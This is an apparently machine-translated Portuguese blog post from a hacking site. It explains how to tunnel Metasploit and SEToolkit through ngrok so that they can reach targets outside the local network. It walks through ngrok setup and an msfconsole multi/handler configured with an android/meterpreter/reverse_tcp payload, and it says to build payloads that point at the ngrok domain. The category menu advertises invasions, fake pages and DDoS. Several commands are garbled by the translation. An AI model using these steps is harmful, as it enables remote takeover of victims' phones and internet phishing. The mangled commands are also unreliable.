Como usar Metasploit, SEToolkit sem abrir portas Kali Linux - Anonymous Hacker

[Latest News][10]

Adobe
Análise de Vulnerabilidade
ANDROID
ANONYMOUS
Anti Vírus
ANTI-DDOS
ANTI-SPYWARES E ADWARES
Antivírus
APK PRO
APOSTILAS
apps
Ativador
CIÊNCIA
Compartilhadores
Computador pc
CURSO PHP
CURSO TCP / IP
CURSOS
Cursos Diversos
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
Desenvolvimento Web
DICAS
Diversos
DOCUMENTARIO
DoS
Editor de Áudio
Editor de Imagem
Editor de Texto
Editor de Vídeo
Engenharia
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
Fundamentos financeiros
Gravadores
Internet
INVASÕES
IPHONE
JOGOS
KALI LINUX
Limpeza e Utilitários
Lixão
MAC OS
macOS
Malware
Manutenção de Pcs
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Produtividade
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
Seo
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
tools
Utilitários
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

Como usar Metasploit, SEToolkit sem abrir portas Kali Linux

Como usar Metasploit, SEToolkit sem abrir portas Kali Linux
Pode ser bastante irritante quando você tem acesso limitado a portas em uma rede. Isso pode causar problemas ao acertar, pois você só pode testar o tráfego na mesma rede. A menos que você possa abrir as portas corretas dentro do painel de administração padrão do roteador por qualquer motivo, às vezes, o acesso a painéis de administração é proibido, por exemplo, se você estiver usando um ponto de acesso móvel, outro exemplo de redes corporativas esconder os painéis e alguns roteadores domésticos que reproduzem até mesmo quando o testador tiver acesso à abertura das portas. A menos que eles simplesmente não tivessem tido o tempo de entrar em vigor, o número de roteadores sem fio só permitirá que o administrador abra portas hoje, você aprenderá a rotear suas conexões através de um túnel seguro externo, isso nos permitirá usar várias ferramentas pentestantes como o Metasploit & SEToolkit fora de nossa rede.
  • Antes de tudo, crie um endereço de e-mail descartável usando getnada.com ou um serviço de e-mail descartável similar. getnada
  • Baixe ngrok  No seu navegador, vá para ngrok.com e escolha um download que se adapte à arquitetura da sua CPU. Ngrok é um site que fornece túneis TCP seguros gratuitamente. Uma vez que o download foi completado, extraia o arquivo Zip e depois o cd para ele, por exemplo, "cd ngrok"
    ngrok1
    Download Page For Ngrok vou usar o NGrok 32 Bit neste tutorial se você usar uma CPU moderna de 64 bits e então baixar a versão de 64 bits de Ngrok
  • Instale o seu authtoken (o código de autenticação abaixo é um exemplo de token de autenticação de cópia da conta ngrok.com. Copie o código de autenticação de sua conta no ngrok.com, vamos usar isso para autenticar nosso túnel. Você pode fazer isso indo para a pasta onde ngrok é armazenado e usando. "/ ngrok authtoken yourauthtokenhere" O código de autenticação será salvo. 
    Exemplo Authtoken
    ./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3
    ngrok2
    Screen Shot Mostra Ngrok Auth Code (Esta conta não é usada por HackingVision e foi excluída após este tutorial)
  • Para criar seu primeiro túnel seguro, use o comando abaixo para configurar um túnel na porta 80. Estou usando a porta http 80 para SET use qualquer porta na qual você gostaria que o ngrok passasse.
    ./ngrok http 80
    Screen Shot mostra ngrok executando com sucesso um tunelamento na porta HTTP 80, os nomes de domínio na captura de tela são domínios externos do seu túnel.
  • Abra a interface da Web em http: // localhost: 4040 para inspecionar e reproduzir solicitações em um navegador da Web de sua escolha. Iniciando o Metasploit Primeiro, você precisará iniciar o Ngrok usando os comandos tcp, pois o Metasploit usará uma conexão TCP reversa. Abra um novo terminal e inicie o Metasploit usando o comando abaixo../ngrok tcp 4444
    msfconsole
    Use seu host local para configurar o srvhost e o lhost.
    definir lhost 0.0.0.0
    set lport 4444
    definir uripath /
    Use a porta que você usou para configurar o ngrok como srvport, isso nos ajudará a fazer um tunelamento de uma sessão Metasploit ou SEToolkit através da Internet.
    Neste tutorial, eu configurarei um manipulador usando as configurações acima para Ngrok. Muitos lendo este guia podem estar usando explorações diferentes completas para minimizar a confusão, estaremos mostrando que você configurou um conversor reverso de Metapreter TCP. Isso ajudará mais tarde ao configurar túneis com outras ferramentas pentesting que usam conexões reversas.
    msfconsole
      msf> use multi / handler 
     msf exploit (manipulador)> set payload android / meterpreter / reverse_tcp 
     msf exploit (manipulador)> set LHOST 0.0.0.0
      msf exploit (manipulador)> set srvhost 0.0.0.0 
     msf exploit (manipulador)> set srvport 4444 
     msf exploit (manipulador)> set uripath / 
     msf exploit (manipulador)> explorar
    Quando a sua criação de Cargas úteis para Metasploit, você precisará incluir seu túnel e também a porta que você usa para o Ngrok.
    Ao criar as cargas úteis, use o domínio fornecido pela Ngrok ou você pode executar ping no domínio para receber e IP e usar o endereço IP a partir dos resultados, use a mesma porta para a carga como seu ouvinte.
    Exemplo SEToolkit
    setoolkit
    Screen Shot Below Mostra SEToolkit configurado para usar host externo.
    Isso funcionará como um túnel para muitas ferramentas mais pentestantes, este tutorial não se limita apenas a Metasploit e SEToolkit. Considere compartilhar este tutorial nas mídias sociais e, com seus amigos, agradecer pelo apoio ao HackingVision , listados alguns links abaixo para ajudá-lo a criar seus túneis TCP e cargas úteis.

Sobre

trabalho com segurança da informação a 13 anos, grande parte desse tempo como professor. Fiz meu bacharelado em ciência da computação, especialização em segurança da informação e logo após, mestrado em ciência da informação.

Nenhum comentário:

Postar um comentário

FECHAR ADS

Start typing and press Enter to search